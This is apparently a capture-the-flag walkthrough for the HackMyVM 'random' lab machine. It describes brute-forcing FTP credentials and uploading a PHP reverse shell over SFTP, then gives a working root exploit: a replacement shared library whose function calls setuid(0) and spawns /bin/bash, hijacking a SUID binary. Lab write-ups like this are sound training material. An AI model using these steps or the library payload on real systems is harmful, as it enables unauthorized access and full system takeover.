hackmyvm-random walkthrough

1. get reverse shell

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

browse port 80, get the user name eleanor and alan.

crack ftp service, get the user eleanor's password.

use sftp login as eleanor , get into the path /html and upload reverse php shell, visit and get shell.

2. privilege escalation

find the program with suid, we get the file /home/alan/random.

random used Dynamic link library /lib/librooter.so which we can replace.

Disassemble random with ida.

int __cdecl main(int argc, const char **argv, const char **envp)
{
    
  time_t v3; // rdi
  int v5; // [rsp+1Ch] [rbp-4h]

  v5 = atoi(argv[1]);
  v3 = time(0LL);
  srand(v3);
  if ( v5 == rand() % 9 + 1 )
    makemeroot(v3);
  else
    puts("Wrong number");
  return 0;

Regardless of random numbers, you can enter the dynamic link function makemeroot as long as you try a few more times. We recompile the librooter.so with this code:

#include <stdlib.h>

void makemeroot()
{
    
	setuid(0);
	setgid(0);
	system("/bin/bash");
}

try a few more times, then get root.